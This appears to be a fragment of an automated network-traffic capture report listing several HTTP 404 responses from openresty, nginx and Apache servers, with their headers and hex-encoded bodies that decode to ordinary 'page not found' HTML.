            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 11 Jan 2025 05:32:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffCache-Control: no-cacheX-Request-Id: 4142429651ce0a3142f157486796473dX-Runtime: 0.043565Content-Encoding: gzipData Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 35 71 dc f2 15 6f a5 bd 16 13 c7 f0 b9 29 24 9c 2a 2e 6b 27 52 db c8 fb 8b 4a a5 4e 68 d5 17 81 0d 74 90 07 26 e0 41 31 78 10 53 d6 1a 6c f1 d7 f3 5b 4c 1d 9b 25 66 24 a6 66 96 f8 bf c7 c7 ad fd e0 a1 0b b6 ef 15 d1 3f 49 fb 78 7c 9c ce 06 51 59 d9 65 9f 9b bc 2a 88 2e 76 f0 14 34 4a 99 0c 7f 57 b8 86 4f dc 61 7f 30 e2 09 55 d8 20 6d ce 25 7a 60 5f 0f 82 ee d0 82 74 39 ba 4e 61 cf ea ef 3c bf 22 36 12 64 7a 38 1b f1 88 db 5a a5 c9 90 56 d6 a4 49 3e 2a a2 92 1b 82 5e e9 0c 23 a1 88 27 ee 0c 17 da 60 df a7 d7 9d fa 34 e8 af 85 ca f4 3a c8 74 da c4 16 b0 b6 6c 2c 20 5a ac d7 eb 8e 7e 21 df 54 a1 65 c6 76 77 6b 09 99 73 36 18 bd e9 ce cc 79 9f b5 59 b0 00 d8 cd 69 78 f4 6e 78 74 4c bf f0 bd 17 f0 ca 69 8f de 81 89 64 8d 42 69 55 17 e2 5f bc 28 69 eb 4c 85 2f 50 2a f3 b0 92 da d7 37 20 ad 1f 9e 1b 9d 34 46 94 d3 68 73 e3 e7 d4 df bf bc 75 e2 53 93 65 33 21 e2 cd 88 18 cf 75 56 77 94 ca c4 0a 52 49 1d 90 b0 79 1e 4a 9d 6b 36 19 c7 24 7d ad 6f f8 2b 45 be 74 a1 e7 1e db 12 7d 0f 93 6a 79 c4 76 9c 1f 2f 87 13 f8 72 fa f9 1c ae ae bf c3 9f d7 37 57 9f 22 8a 63 b8 87 28 27 67 95 03 6a a0 5a 57 cc 90 03 ad 7d 6b 82 d3 30 af 84 cc bc dc 80 5e 2b 58 e3 dc 0a 87 01 c5 6f e2 89 87 af 90 26 53 81 1e eb 96 08 c6 c7 06 a5 e4 29 92 97 72 df 49 17 5f 6f 5e 39 a7 95 ed ed 74 a4 e5 db 0a 34 5a c8 b8 b9 0b e7 39 7b 31 a6 3c 4b 5e 4c 8e 0f 95 2b 7e 58 0a 30 c5 84 c6 c7 6f 7e 5b 60 26 aa 22 11 34 31 0d 5d 46 23 Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZx
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 11 Jan 2025 05:32:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 2088Connection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Request-Id: 49fe5fcdb0b6c214c609b440749161a5X-Runtime: 0.039283Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 79 6c 65 73 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 77 69 64 65 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 36 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 20 20 20 20 6d 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 61 2e 61 73 79 6e 63 3d 31 3b 61 2e 73 72 63 3d 67 3b 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 0a 20 20 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 05:32:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 05:32:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 05:33:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 05:33:03 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 05:33:36 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 